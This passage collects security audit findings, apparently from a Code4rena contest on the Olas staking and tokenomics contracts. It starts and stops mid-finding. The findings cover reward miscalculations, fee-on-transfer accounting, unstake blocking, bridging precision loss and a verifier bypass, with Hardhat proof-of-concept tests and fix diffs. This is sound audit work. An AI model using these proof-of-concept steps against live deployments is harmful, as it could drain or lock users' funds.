                    returnAmount += stakingIncentive - normalizedStakingAmount;
                    // Downsize staking incentive to a specified number of bridging decimals
                    stakingIncentive = normalizedStakingAmount;
                }
                // Adjust total staking incentive amount
                totalStakingIncentive += stakingIncentive;
            }
            // Adjust total return amount
            totalReturnAmount += returnAmount;
        }
    }

From the above for loop it is visible that the staking incentives are calculated till lastClaimedEpoch-1.

for (uint256 j = firstClaimedEpoch; j < lastClaimedEpoch; ++j) {

Following function is used to check for which epoches is the nominee eligible to receive the staking incentives.

 (firstClaimedEpoch, lastClaimedEpoch) =
            _checkpointNomineeAndGetClaimedEpochCounters(nomineeHash, numClaimedEpochs);
function _checkpointNomineeAndGetClaimedEpochCounters(
        bytes32 nomineeHash,
        uint256 numClaimedEpochs
    ) internal view returns (uint256 firstClaimedEpoch, uint256 lastClaimedEpoch) {
        // Get the current epoch number
        uint256 eCounter = ITokenomics(tokenomics).epochCounter();

        // Get the first claimed epoch, which is equal to the last claiming one
        firstClaimedEpoch = mapLastClaimedStakingEpochs[nomineeHash];

        // This must never happen as the nominee gets enabled when added to Vote Weighting
        // This is only possible if the dispenser has been unset in Vote Weighting for some time
        // In that case the check is correct and those nominees must not be considered
        if (firstClaimedEpoch == 0) {
            revert ZeroValue();
        }

        // Must not claim in the ongoing epoch
        if (firstClaimedEpoch == eCounter) {
            // Epoch counter is never equal to zero
            revert Overflow(firstClaimedEpoch, eCounter - 1);
        }

        // We still need to claim for the epoch number following the one when the nominee was removed
        uint256 epochAfterRemoved = mapRemovedNomineeEpochs[nomineeHash] + 1;
        // If the nominee is not removed, its value in the map is always zero, unless removed
        // The staking contract nominee cannot be removed in the zero-th epoch by default
        if (epochAfterRemoved > 1 && firstClaimedEpoch >= epochAfterRemoved) {
            revert Overflow(firstClaimedEpoch, epochAfterRemoved - 1);
        }

        // Get a number of epochs to claim for based on the maximum number of epochs claimed
        lastClaimedEpoch = firstClaimedEpoch + numClaimedEpochs;

        // Limit last claimed epoch by the number following the nominee removal epoch
        // The condition for is lastClaimedEpoch strictly > because the lastClaimedEpoch is not included in claiming
        if (epochAfterRemoved > 1 && lastClaimedEpoch > epochAfterRemoved) {
            lastClaimedEpoch = epochAfterRemoved;
        }

        // Also limit by the current counter, if the nominee was removed in the current epoch
        if (lastClaimedEpoch > eCounter) {
            lastClaimedEpoch = eCounter;
        }
    }

From the following if condition it is clear that nominee is also eligible to receive staking incentives for the epoch in which it was removed

 if (epochAfterRemoved > 1 && lastClaimedEpoch > epochAfterRemoved) {
            lastClaimedEpoch = epochAfterRemoved;
        }

So as initially for loop ran till lastClaimedEpoch -1 thus it is evident that removed nominnee is eligible for the staking incentives in which it was removed too.

Now lets see what happens when a nominee is removed
Firstly it is removed in VoteWeighting.sol in removeNominee function which is as follows

function removeNominee(bytes32 account, uint256 chainId) external {
        // Check for the contract ownership
        if (msg.sender != owner) {
            revert OwnerOnly(owner, msg.sender);
        }

        // Get the nominee struct and hash
        Nominee memory nominee = Nominee(account, chainId);
        bytes32 nomineeHash = keccak256(abi.encode(nominee));

        // Get the nominee id in the nominee set
        uint256 id = mapNomineeIds[nomineeHash];
        if (id == 0) {
            revert NomineeDoesNotExist(account, chainId);
        }

        // Set nominee weight to zero
        uint256 oldWeight = _getWeight(account, chainId);
        uint256 oldSum = _getSum();
        uint256 nextTime = (block.timestamp + WEEK) / WEEK * WEEK;
        pointsWeight[nomineeHash][nextTime].bias = 0;
        timeWeight[nomineeHash] = nextTime;

        // Account for the the sum weight change
        uint256 newSum = oldSum - oldWeight;
        pointsSum[nextTime].bias = newSum;
        timeSum = nextTime;

        // Add to the removed nominee map and set
        mapRemovedNominees[nomineeHash] = setRemovedNominees.length;
        setRemovedNominees.push(nominee);

        // Remove nominee from the map
        mapNomineeIds[nomineeHash] = 0;

        // Shuffle the current last nominee id in the set to be placed to the removed one
        nominee = setNominees[setNominees.length - 1];
        bytes32 replacedNomineeHash = keccak256(abi.encode(nominee));
        mapNomineeIds[replacedNomineeHash] = id;
        setNominees[id] = nominee;
        // Pop the last element from the set
        setNominees.pop();

        // Remove nominee in dispenser, if applicable
        address localDispenser = dispenser;
        if (localDispenser != address(0)) {
            IDispenser(localDispenser).removeNominee(nomineeHash);
        }

        emit RemoveNominee(account, chainId, newSum);
    }

Key thing to note is that if a nominee is removed in ith week then its weight/bias in the upcoming weeks is set to zero i.e from i+1 weeks it will have no weight

uint256 nextTime = (block.timestamp + WEEK) / WEEK * WEEK;
        pointsWeight[nomineeHash][nextTime].bias = 0;

Also remove nominee in dispensor is also called
which is as follows

function removeNominee(bytes32 nomineeHash) external {
        // Check for the contract ownership
        if (msg.sender != voteWeighting) {
            revert ManagerOnly(msg.sender, voteWeighting);
        }

        // Check for the retainer hash
        if (retainerHash == nomineeHash) {
            revert WrongAccount(retainer);
        }

        // Get the epoch counter
        uint256 eCounter = ITokenomics(tokenomics).epochCounter();

        // Get the previous epoch end time
        // Epoch counter is never equal to zero
        uint256 endTime = ITokenomics(tokenomics).getEpochEndTime(eCounter - 1);

        // Get the epoch length
        uint256 epochLen = ITokenomics(tokenomics).epochLen();

        // Check that there is more than one week before the end of the ongoing epoch
        // Note that epochLen cannot be smaller than one week as per specified limits
        uint256 maxAllowedTime = endTime + epochLen - 1 weeks;
        if (block.timestamp >= maxAllowedTime) {
            revert Overflow(block.timestamp, maxAllowedTime);
        }

        // Set the removed nominee epoch number
        mapRemovedNomineeEpochs[nomineeHash] = eCounter;
    }

Key thing to note here is the following condition

uint256 maxAllowedTime = endTime + epochLen - 1 weeks;
        if (block.timestamp >= maxAllowedTime) {
            revert Overflow(block.timestamp, maxAllowedTime);
        }

From the above condition it is clear that it is only allowed to remove a nominee if the time left to epoch end is greater than a week.
In simpler terms if the epoch end time is scheduled to be at ith week then the nominee can only be removed in the weeks before the ith week(not inlcuding the ith week).

As we have seen from above that if a nominee is removed in ith week then its weight in the weeks starting from the i+1th week will be zero.

So now when the staking incentives are calculated for the removed nominee for the epoch in which they were removed it would always return zero as the weight of the nominee will always be zero.

 ITokenomics.StakingPoint memory stakingPoint =
                ITokenomics(tokenomics).mapEpochStakingPoints(j);

            uint256 endTime = ITokenomics(tokenomics).getEpochEndTime(j);

            // Get the staking weight for each epoch and the total weight
            // Epoch endTime is used to get the weights info, since otherwise there is a risk of having votes
            // accounted for from the next epoch
            // totalWeightSum is the overall veOLAS power (bias) across all the voting nominees
     (uint256 stakingWeight, uint256 totalWeightSum) =
         IVoteWeighting(voteWeighting).nomineeRelativeWeight(stakingTarget, chainId, endTime);

(@==>   /// here staking weight will be zero for the removed epoch.  )     

In the current code base as it is intended that the removed nominee is eligible for the epoch in which they were removed and currently they are not receiving it thus it is a issue/bug.

Tools Used

Manual review

Recommended Mitigation Steps

The most easy way would be to not allow staking incentives for the epoch in which they were removed or you can do the following
Allow removing a nominee only when there is less than a week time left before the epoch ends
for that only change the following if condition https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Dispenser.sol#L774 to
if (block.timestamp < maxAllowedTime) {
revert ;
}
But in this case too staking incentives can be lost if the epoch didn't end for few more weeks.

Assessed type

Context

Slope may be miscalculated

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L534

Vulnerability details

Impact

In the voteForNomineWeights function, the influence of oldSlope on the slope is considered.
However, due to the possibility of asynchronous state changes between pointsWeight, pointsSum, and changesWeight, changesSum, Slope calculation errors may occur.

Proof of Concept

github:https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L534

        if (oldSlope.end > nextTime) {
            pointsWeight[nomineeHash][nextTime].slope =
                _maxAndSub(pointsWeight[nomineeHash][nextTime].slope + newSlope.slope, oldSlope.slope);
            pointsSum[nextTime].slope = _maxAndSub(pointsSum[nextTime].slope + newSlope.slope, oldSlope.slope);
        } else {
            pointsWeight[nomineeHash][nextTime].slope += newSlope.slope;
            pointsSum[nextTime].slope += newSlope.slope;
        }
        if (oldSlope.end > block.timestamp) {
            // Cancel old slope changes if they still didn't happen
            changesWeight[nomineeHash][oldSlope.end] -= oldSlope.slope;
            changesSum[oldSlope.end] -= oldSlope.slope;
        }

When oldSlope.end <= nextTime, we do not need to subtract oldSlope.slope because it has already been or will be subtracted from _getWeight() and _getSum()

github:https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L233C1-L236C36

            if (pt.bias > dBias) {
                pt.bias -= dBias;
                uint256 dSlope = changesSum[t];
                pt.slope -= dSlope;

github:https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L275

            if (pt.bias > dBias) {
                pt.bias -= dBias;
                uint256 dSlope = changesWeight[nomineeHash][t];
                pt.slope -= dSlope;
            } 

But considering this situation:

When block.timestamp < oldSlope.end <= nextTime, changesWeight and changesSum will subtract oldSlope.slope, but pointsWeight and pointsSum did not subtract oldSlope.slope, which will result in pointsWeight and pointsSum never subtracting oldSlope.slope.This leads to abnormal slope calculation

POC:

  1. Assuming oldSlope.slope is 100,
    oldSlope.end is 2 weeks,
    block.timestamp is 1.5 weeks,
    nextTime is (block.timestamp + 1 week / 1 week= 2 weeks),
    changesWeightp[oldSlope.end] and changesSum [oldSlope.end] are 100.

  2. call voteForNomineWeights function,
    because oldSlope.end > block.timestamp(2 week > 1.5 week) changesWeightp[oldSlope.end] and changesSum [oldSlope.end] become 0 ( - oldSlope.slope )
    because oldSlope.end = nextTime,PointsWeight and pointsSum did not subtract oldSlope.slope.

  3. when block.timestamp >= 2 weeks, call _getWeight() _getSum(),because changesWeightp[oldSlope.end] and changesSum [oldSlope.end] become 0(- oldSlope.slope), PointsWeight and pointsSum will not subtract oldSlope.slope.
    Then oldSlope.slope will not subtract forever.

Tools Used

Manual audit

Recommended Mitigation Steps

When oldSlope.end=nextTime, oldSlope.slope also needs to be subtracted

-        if (oldSlope.end > nextTime) {
+        if (oldSlope.end >= nextTime) {
            pointsWeight[nomineeHash][nextTime].slope =
                _maxAndSub(pointsWeight[nomineeHash][nextTime].slope + newSlope.slope, oldSlope.slope);
            pointsSum[nextTime].slope = _maxAndSub(pointsSum[nextTime].slope + newSlope.slope, oldSlope.slope);
        } else {
            pointsWeight[nomineeHash][nextTime].slope += newSlope.slope;
            pointsSum[nextTime].slope += newSlope.slope;
        }
        if (oldSlope.end > block.timestamp) {
            // Cancel old slope changes if they still didn't happen
            changesWeight[nomineeHash][oldSlope.end] -= oldSlope.slope;
            changesSum[oldSlope.end] -= oldSlope.slope;
        }

Assessed type

Other

A staked service may not be rewarded as available rewards may show obsolete value

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L721

Vulnerability details

Impact

The availableRewards is not guaranteed to have the latest updated value. So, during staking a service, its value must be updated beforehand. Otherwise, there could be a situation that a staked service does not earn any reward despite multisig transaction execution.

Proof of Concept

  • Suppose available rewards is 0.01 ETH.

  • Then, Service1 is staked, and its multisig executes transactions.

  • One liveness period is elapsed.

  • Suppose, the service1 should be rewarded 0.01 ETH (equal to available rewards) because of multisig transaction execution, if the function checkpoint() is called. But, suppose this function is not called yet, so available rewards is still equal to 0.01 ETH.

  • Then, service2 is staked. It will be staked successfully because the available rewards is still nonzero.

    function stake(uint256 serviceId) external {
       // Check if there available rewards
       if (availableRewards == 0) {
           revert NoRewardsAvailable();
       }
       //....
    }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L721

  • Then, before the service2 multisig executes any transactions, the function checkpoint() is called by service1 owner (or anyone). By doing so, the rewards allocated to service1 will be calculated (which is equal to 0.01 ETH), and available rewards will be updated to zero.
    https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L661

  • Then, service2 multisig executes transactions. It is expected that because of multisig transaction execution, rewards will be allocated to service2. But, since the checkpoint() is called just before and all the available rewards are allocated to service1, nothing is left for service2.

  • Now, the service1 has 0.01 ETH reward that can be claimed any time. Regarding service2, although multisig has executed transactions, there is no reward to be allocated to it.

The root cause of this issue is that when a service is staked, it only checks that what the current value of availableRewards is. If it is nonzero, it assumes that there is available rewards to be allocated to this service if multisig executes transaction, so it allows to stake. But, it is not guaranteed that the availableRewards is correct and updated. Because, availableRewards can include the rewards allocated to other services that have not claimed yet (or the checkpoint() is not called yet), so its value could be obsolete.

In other words, when staking a service, the value of availableRewards should be updated by calling checkpoint(). But since the checkpoint() calls the internal function _calculateStakingRewards, and this function can update only if livenessPeriod is elapsed from the last checkpoint, there should be a better solution explained in the Recommendation section.

    function _calculateStakingRewards() internal view returns (
       uint256 lastAvailableRewards,
       uint256 numServices,
       uint256 totalRewards,
       uint256[] memory eligibleServiceIds,
       uint256[] memory eligibleServiceRewards,
       uint256[] memory serviceIds,
       uint256[][] memory serviceNonces,
       uint256[] memory serviceInactivity
   )
   {
       //.....
       if (block.timestamp - tsCheckpointLast >= livenessPeriod && lastAvailableRewards > 0) {
       //.....
       }
   }

https://github.com/code-423n4/2024-05-olas/blob/main/registries/contracts/staking/StakingBase.sol#L536

Test Case

In the following test, the available rewards is 0.01 ETH. Then service1 is staked and its multisig executes transaction. Then, after a liveness period, service2 is staked (still the available rewards is equal to 0.01 ETH). Before the service2 multisig executes transaction, checkpointAndClaim is called for service1, thus 0.01 ETH is rewarded to service1 and available rewards is reduced to zero. Then, service2 multisig executes transaction, and claims its rewards, but it will revert, because there is no rewards left.

        it("Service2 does not earn any reward", async function () {
            // Take a snapshot of the current state of the blockchain
            const snapshot = await helpers.takeSnapshot();

            // Deposit to the contract
            await deployer.sendTransaction({ to: stakingNativeToken.address, value: ethers.utils.parseEther("0.01") });

            ////////////////////////////////////// Service 1
            // Approve services
            await serviceRegistry.approve(stakingNativeToken.address, serviceId);

            // Stake the service
            await stakingNativeToken.stake(serviceId);

            // Get the service multisig contract
            const service = await serviceRegistry.getService(serviceId);
            const multisig = await ethers.getContractAt("GnosisSafe", service.multisig);

            // Make transactions by the service multisig
            let nonce = await multisig.nonce();
            let txHashData = await safeContracts.buildContractCall(multisig, "getThreshold", [], nonce, 0, 0);
            let signMessageData = await safeContracts.safeSignMessage(agentInstances[0], multisig, txHashData, 0);
            await safeContracts.executeTx(multisig, txHashData, [signMessageData], 0);
            ///////////////////////////////////


            // Increase the time for the liveness period
            await helpers.time.increase(livenessPeriod);


            ////////////////////////////////////// Service 2
            await serviceRegistry.approve(stakingNativeToken.address, serviceId + 1);
            await stakingNativeToken.stake(serviceId + 1);

            // the transactions are not made yet by the service2 multisig
            ///////////////////////////////////

            let reward = await stakingNativeToken.calculateStakingReward(serviceId);
            let reward2 = await stakingNativeToken.calculateStakingReward(serviceId + 1);

            console.log("service1 rewards: ", reward);
            console.log("service2 rewards: ", reward2);
            console.log("available rewards: ", await stakingNativeToken.availableRewards());


            console.log("to-be-claimed rewards allocated to service1: ", await stakingNativeToken.callStatic.checkpointAndClaim(serviceId));

            // Call claim (calls checkpoint as well)
            await stakingNativeToken.checkpointAndClaim(serviceId);

            //////////////// Service 2: making transactions by service2 multisig
            // Get the service multisig contract
            const service2 = await serviceRegistry.getService(serviceId + 1);
            const multisig2 = await ethers.getContractAt("GnosisSafe", service2.multisig);

            // Make transactions by the service multisig
            let nonce2 = await multisig2.nonce();
            let txHashData2 = await safeContracts.buildContractCall(multisig2, "getThreshold", [], nonce2, 0, 0);
            let signMessageData2 = await safeContracts.safeSignMessage(agentInstances[1], multisig2, txHashData2, 0);
            await safeContracts.executeTx(multisig2, txHashData2, [signMessageData2], 0);
            //////////////////////

            console.log("available rewards: ", await stakingNativeToken.availableRewards());

            // to-be-claimed rewards allocated to service2 is zero because available rewards is zero
            await expect(stakingNativeToken.checkpointAndClaim(serviceId + 1)).to.be.reverted;


            // Restore a previous state of blockchain
            snapshot.restore();
        });

The result is:

  Staking
    Staking and unstaking
service1 rewards:  BigNumber { value: "10000000000000000" }
service2 rewards:  BigNumber { value: "0" }
available rewards:  BigNumber { value: "10000000000000000" }
to-be-claimed rewards allocated to service1:  BigNumber { value: "10000000000000000" }
available rewards:  BigNumber { value: "0" }
      ✔ Service2 does not earn any reward

Tools Used

Recommended Mitigation Steps

A view function similar to checkpoint should be implemented so that it does not change the storage variables. This function should call a function similar to _calculateStakingRewards that does not have the condition block.timestamp - tsCheckpointLast >= livenessPeriod.

    function checkpointRead() public view returns (uint256 availableRewardsTemp)   
    {
        //.....
        (uint256 lastAvailableRewards, uint256 numServices, uint256 totalRewards,
            uint256[] memory eligibleServiceIds, uint256[] memory eligibleServiceRewards,
            uint256[] memory serviceIds, uint256[][] memory serviceNonces,
            uint256[] memory serviceInactivity) = _calculateStakingRewards2();    
        //....    
    }

    function _calculateStakingRewards2() internal view returns (
        uint256 lastAvailableRewards,
        uint256 numServices,
        uint256 totalRewards,
        uint256[] memory eligibleServiceIds,
        uint256[] memory eligibleServiceRewards,
        uint256[] memory serviceIds,
        uint256[][] memory serviceNonces,
        uint256[] memory serviceInactivity
    )
    {
        //.....
        if (lastAvailableRewards > 0) {//...}
        //....
    }

During staking, the function checkpointRead should be called to return the updated value of availableRewards as availableRewardsTemp without changing the state.

    function stake(uint256 serviceId) external {

        uint availableRewardsTemp = checkpointRead();

        // Check if there is available rewards
        if (availableRewardsTemp == 0) {
            revert NoRewardsAvailable();
        }

        //.....
    }

Assessed type

Context

Incorrect accounting when using fee-on-transfer tokens leads to insolvency

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L108
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L125

Vulnerability details

The StakingToken contract allows the protocol to deposit and withdraw staking rewards in an arbitrary ERC20 token to be distributed to eligible services. However, the accounting logic does not properly handle tokens that charge a fee on transfer. This can lead to incorrect tracking of the total rewards balance and eventual insolvency of the staking contract.

This contract is meant to support fee-on-transfer tokens as per the README and confirmed by the sponsor.

The core issue is that when tokens are transferred into or out of the contract in the deposit() and _withdraw() functions, the actual transferred amount is not verified. The code simply assumes the transferred amount equals the specified amount parameter.

If stakingToken is a fee-on-transfer token, the actual amount received by the contract in deposit() will be less than amount. Similarly, the actual amount sent to the recipient in _withdraw() will be less than amount.

However, the contract still records the full amount as deposited and withdrawn. Over time, this will cause balance and availableRewards to diverge from the real token balance, eventually leading to a situation where _withdraw() attempts to send out more tokens than the contract holds.

Impact

If a fee-on-transfer token is used for staking rewards, the accounting will become increasingly inaccurate over time. Eventually withdrawals will fail as the contract tries to send out more tokens than it owns, leading to loss of funds and breaking core functionality.

Proof of Concept

  1. Protocol deposits 1000 stakingToken into the contract via deposit(). stakingToken takes a 1% transfer fee. Only 990 tokens are received but balance and availableRewards are incremented by 1000.
  2. Over time more deposits are made. The actual balance continues to diverge from balance and availableRewards.
  3. Protocol attempts to withdraw 1000 stakingToken via _withdraw() to distribute as staking rewards. However the real balance is only 900 tokens at this point. The withdrawal fails, staking rewards cannot be paid out.

Tools Used

Manual review

Recommended Mitigation Steps

In deposit() and _withdraw(), use balanceOf() to verify the actual change in balance before and after the transfer. Only update balance and availableRewards based on the real amount transferred.

Assessed type

ERC20

Blocklisted or paused state in staking token can prevent service owner from unstaking

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingBase.sol#L868

Vulnerability details

The StakingBase contract allows service owners to stake their service by transferring it to the contract via stake(). The service's multisig address is set in the ServiceInfo struct at this point and cannot be modified afterwards. When the owner wants to unstake the service via unstake(), the contract attempts to transfer any accumulated rewards to this multisig address:

File: StakingBase.sol
862:         // Transfer the service back to the owner
863:         // Note that the reentrancy is not possible due to the ServiceInfo struct being deleted
864:         IService(serviceRegistry).safeTransferFrom(address(this), msg.sender, serviceId);
865: 
866:         // Transfer accumulated rewards to the service multisig
867:         if (reward > 0) {
868:             _withdraw(multisig, reward);
869:         }

However, the protocol is meant to support reward tokens which may have a blocklist and/or pausable functionality.

If the multisig address gets blocklisted by the reward token at some point after staking or the reward token pauses transfers, the _withdraw() call in unstake() will fail. As a result, the service owner will not be able to unstake their service and retrieve it.

Impact

If a service's multisig address gets blocklisted by the reward token after the service is staked, the service owner will be permanently unable to unstake the service and retrieve it from the StakingBase contract. The service will be stuck.

If the reward token pauses transfers, the owner will not be able to unstake the service until transfers are unpaused.

Additionally, the owner will not be able to claim rewards either, since these are sent to the multisig.

Proof of Concept

  1. Owner calls stake() to stake their service, passing in serviceId.
  2. StakingBase contract transfers the service NFT from owner and stores the service's multisig address in ServiceInfo.
  3. Reward token blocklists the multisig address.
  4. Owner calls unstake() to unstake the service and retrieve the NFT.
  5. unstake() attempts to transfer accumulated rewards to the now-blocklisted multisig via _withdraw().
  6. The reward transfer fails, reverting the whole unstake() transaction.
  7. Owner is unable to ever unstake the service. Service is stuck in StakingBase contract.

Tools Used

Manual review

Recommended Mitigation Steps

Consider implementing functionality to update the multisig address. This address should ideally be updated via the service registry to ensure it is properly deployed (seeing as it must match a specific bytecode), after which it can be updated in the staking contract by pulling it from the registry.

Alternatively and to also address the pausing scenario, unstaking could be split into two separate steps - first retrieve the service NFT, then withdraw any available rewards. This way, blocklisting or pausing would not prevent retrieval of the NFT itself.

Assessed type

Token-Transfer

Non-normalized amounts sent via Wormhole lead to failure to redeem incentives

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1174

Vulnerability details

Wormhole only supports sending tokens in 8 decimal precision. This is addressed in the code via the getBridgingDecimals() method, which is overridden in WormholeDepositProcessorL1 to return 8. This is then passed as parameter to calculateStakingIncentives() in the Dispenser contract to normalize the transferAmount sent via the bridge to the smaller precision and return the remaining amount to the Tokenomics contract.

However, the withheld amount from the target chain is then subtracted from the transferAmount, so it's important that this amount is also normalized in order to avoid precision loss if the resulting amount after subtracting became unnormalized. This is highlighted in the code in the following comment:

File: Dispenser.sol
1010:             // Note: in case of normalized staking incentives with bridging decimals, this is correctly managed
1011:             // as normalized amounts are returned from another side
1012:             uint256 withheldAmount = mapChainIdWithheldAmounts[chainId];
1013:             if (withheldAmount > 0) {
1014:                 // If withheld amount is enough to cover all the staking incentives, the transfer of OLAS is not needed
1015:                 if (withheldAmount >= transferAmount) {
1016:                     withheldAmount -= transferAmount;
1017:                     transferAmount = 0;
1018:                 } else {
1019:                     // Otherwise, reduce the transfer of tokens for the OLAS withheld amount
1020:                     transferAmount -= withheldAmount;
1021:                     withheldAmount = 0;
1022:                 }
1023:                 mapChainIdWithheldAmounts[chainId] = withheldAmount;
1024:             }

However, this is not actually the case and withheld amounts returned via Wormhole are in fact unnormalized. While the amounts are normalized if synced via the fallback privileged syncWithheldAmountMaintenance() function, this logic isn't implemented in the syncWithheldAmount() function, which will be called in the normal flow of operations as follows:

  1. anyone can call syncWithheldTokens() on WormholeTargetDispenserL2
  2. syncWithheldTokens() will encode the unnormalized withheld amount and send it to L1
  3. this triggers receiveWormholeMessages() on WormholeDepositProcessorL1
  4. receiveWormholeMessages() will then pass the same unnormalized amount to Tokenomics.syncWithheldAmount()

Impact

Unnormalized amount will be sent via Wormhole any time a withheld amount is synced from L2. This has several consequences:

  • Dust amounts will be accumulated in the WormholeDepositProcessorL1 contract
  • More severely, some users will be unable to redeem their incentives on L2 due to the difference between the total OLAS balance of the WormholeTargetDispenserL2 (withheld amount + normalized transferAmount after bridging) contract and the total incentives calculated in the L1 dispenser (withheld amount + unnormalized transferAmount after subtracting withheld amount)

Proof of Concept

  • WormholeTargetDispenserL2 withholds 0.123456789 OLAS (unnormalized).
  • Anyone calls syncWithheldTokens() to send the unnormalized amount to L1.
  • WormholeDepositProcessorL1 receives the unnormalized amount and calls syncWithheldAmount() on the Dispenser contract.
  • Dispenser updates its records with the unnormalized amount of 0.123456789 OLAS.
  • A user claims incentives on L1.
  • Dispenser calculates the transferAmount as 0.2 OLAS.
  • Dispenser subtracts the unnormalized withheld amount, resulting in a transferAmount of 0.076543211 OLAS.
  • WormholeDepositProcessorL1 sends 0.07654321 OLAS to L2 via Wormhole and keeps 0.000000001 OLAS (Wormhole only transfers the normalized amount from the caller)
  • The user tries to redeem incentives on L2.
  • WormholeTargetDispenserL2 has 0.199999999 OLAS (withheld amount + 0 OLAS from L1).
  • The user cannot redeem due to the discrepancy.

Tools Used

Manual review

Recommended Mitigation Steps

Implement the normalizing logic in syncWithheldAmount() as well.

Assessed type

Decimal

Protocol is not compliant with fee-on-transfer tokens

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L115-L128

Vulnerability details

Impact

The registries contracts have a StakingBase implementation contract that is a staking service. This base is inherited by two other contracts - one is for the chain's native tokens (StakingNativeToken) and the other for any ERC20 (StakingToken).

The problem arises in the StakingToken contract.

Proof of Concept

The StakingToken::deposit fonction is used to deposit tokens for stake. It revords the balance of tokens and also the availableRewards. These two variables are incremented with the amount passed as a deposit.

    function deposit(uint256 amount) external {
        // Add to the contract and available rewards balances
        uint256 newBalance = balance + amount; 
        uint256 newAvailableRewards = availableRewards + amount;

        // Record the new actual balance and available rewards
        balance = newBalance;
        availableRewards = newAvailableRewards;

        // Add to the overall balance
        SafeTransferLib.safeTransferFrom(stakingToken, msg.sender, address(this), amount);

        emit Deposit(msg.sender, amount, newBalance, newAvailableRewards);
    }

Adding the amount directly to the balance and availableRewards however is problematic if the token is a fee-on-transfer token. The problem is that X % of amount would be kept by the token as fee and the actual amount that would be transferred would be less.

Over time this would cause the protocol to lose funds.

Tools Used

Manual Review

Recommended Mitigation Steps

In StakingToken::deposit() count the amount of tokens transfered before and after the transfer and increment balance and availableBalance with that amount

    function deposit(uint256 amount) external {
        // Add to the contract and available rewards balances
-        uint256 newBalance = balance + amount;
-        uint256 newAvailableRewards = availableRewards + amount;

        // Record the new actual balance and available rewards
-       balance = newBalance;
-       availableRewards = newAvailableRewards;

+       uint256 balanceBefore = IERC20(stakingToken).balanceOf(address(this));

        // Add to the overall balance
        SafeTransferLib.safeTransferFrom(stakingToken, msg.sender, address(this), amount);
+       uint256 balanceAfter = IERC20(stakingToken).balanceOf(address(this));

+       balance += (balanceAfter - balanceBefore)
+       availableRewards += (balanceAfter - balanceBefore)

        emit Deposit(msg.sender, amount, newBalance, newAvailableRewards);
    }

Note that this solution would update variables after the actual transfer which open the possibility of reentrancy if the token supports callbacks - so just in case also add nonReentrant modifier

Assessed type

ERC20

Verifying the staking instance can be bypassed

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingVerifier.sol#L206-L221

Vulnerability details

Impact

Detailed description of the impact of this finding.

Proof of Concept

Comment out the stakingToken function in MockStaking and add the following test to ServiceStakingFactory.js

Run with: npx hardhat test --grep "Test verification on no staking token function"

        it("Test verification on no staking token function", async function () {
            // Set the verifier
            await stakingFactory.changeVerifier(stakingVerifier.address);

            // Whitelist implementation
            await stakingVerifier.setImplementationsStatuses([staking.address], [true], true);

            initPayload = staking.interface.encodeFunctionData("initialize", [token.address]);
            
            await expect(
                stakingFactory.createStakingInstance(staking.address, initPayload)
            ).to.be.revertedWithCustomError(stakingFactory, "UnverifiedProxy");
        });

Tools Used

Manual Review, JS

Recommended Mitigation Steps

In StakingVerifier::vefiryInstance return false if the staticall fails

    function verifyInstance(address instance, address implementation) external view returns (bool) {
...
        bytes memory tokenData = abi.encodeCall(IStaking.stakingToken, ());
        (bool success, bytes memory returnData) = instance.staticcall(tokenData);

        // Check the returnData is the call was successful
        if (success) {
            // The returned size must be 32 to fit one address
            if (returnData.length == 32) {
                address token = abi.decode(returnData, (address));
                if (token != olas) {
                    return false;
                }
            } else {
                return false;
            }
+        } else {
+            return false;
+        }

        return true;
    }

Assessed type

Invalid Validation

The `msg.value` - `cost` for multiple cross-chain bridges are not refunded to users

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/ArbitrumDepositProcessorL1.sol#L119-L192
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/WormholeDepositProcessorL1.sol#L59-L98
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/WormholeTargetDispenserL2.sol#L89-L124

Vulnerability details

In multiple bridges, in _sendMessage there is a cost variable which is usually obtained by calling the bridge integration gas price estimator.

The problem is that when msg.value > cost, since cost is usually dynamic, the msg.value - cost will not be refunded to the transaction originator.

For instance, for the Wormhole integrator below:

WormholeTargetDispenserL2.sol#L89-L124

    function _sendMessage(uint256 amount, bytes memory bridgePayload) internal override {
        // Check for the bridge payload length
        if (bridgePayload.length != BRIDGE_PAYLOAD_LENGTH) {
            revert IncorrectDataLength(BRIDGE_PAYLOAD_LENGTH, bridgePayload.length);
        }

        // Extract refundAccount and gasLimitMessage from bridgePayload
        (address refundAccount, uint256 gasLimitMessage) = abi.decode(bridgePayload, (address, uint256));
        // If refundAccount is zero, default to msg.sender
        if (refundAccount == address(0)) {
            refundAccount = msg.sender;
        }

        // Check the gas limit values for both ends
        if (gasLimitMessage < GAS_LIMIT) {
            gasLimitMessage = GAS_LIMIT;
        }

        if (gasLimitMessage > MAX_GAS_LIMIT) {
            gasLimitMessage = MAX_GAS_LIMIT;
        }

        // Get a quote for the cost of gas for delivery
